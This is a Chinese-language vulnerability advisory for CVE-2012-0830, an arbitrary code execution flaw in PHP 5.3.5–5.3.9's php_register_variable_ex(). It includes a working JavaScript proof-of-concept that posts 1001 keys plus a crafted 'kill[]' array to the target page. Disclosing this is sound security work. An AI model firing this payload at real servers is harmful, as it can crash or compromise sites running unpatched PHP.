PHP “php_register_variable_ex()”函数任意代码执行漏洞

PHP “php_register_variable_ex()”函数任意代码执行漏洞

发布日期：2012-02-02
更新日期：2012-02-03

受影响系统：
PHP PHP 5.3.9
PHP PHP 5.3.8
PHP PHP 5.3.7
PHP PHP 5.3.6
PHP PHP 5.3.5
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51830
CVE(CAN) ID: CVE-2012-0830

PHP是一种在电脑上运行的脚本语言，主要用途是在于处理动态网页，包含了命令行运行接口或者产生图形用户界面程序。

PHP在php_register_variable_ex()函数在修补哈希冲突问题的代码实现上存在漏洞，攻击者可利用此漏洞执行任意代码。

<*来源：Stefan Esser （s.esser@ematters.de）
 
  链接：http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
*>

测试方法：
--------------------------------------------------------------------------------
警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

// Simple proof of concept for PHP bug (CVE-2012-0830) described by Stefan Esser (@i0n1c)
// http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/

// Generate 1000 normal keys and one array
function createEvilObj () {
    var evil_obj = {};
    for (var i = 0; i < 1001; i++) {
        evil_obj[i] = 1;
    }
    evil_obj['kill[]'] = 'kill';
    return evil_obj;
}

// Serialize Javascript object into POST data
function serializeObj (obj) {
    var str = [];
    for(var p in obj) {
        str.push(p + "=" + obj[p]);
    }
    return str.join("&");
}

// Run attack
function attackSite () {
    var bad = serializeObj(createEvilObj());
    var xhr = new XMLHttpRequest();
    xhr.open("POST", location.href, true);
    xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
    xhr.setRequestHeader('Content-Length', bad.length);
    xhr.send(bad);
}

attackSite();

建议：
--------------------------------------------------------------------------------
厂商补丁：

PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.php.net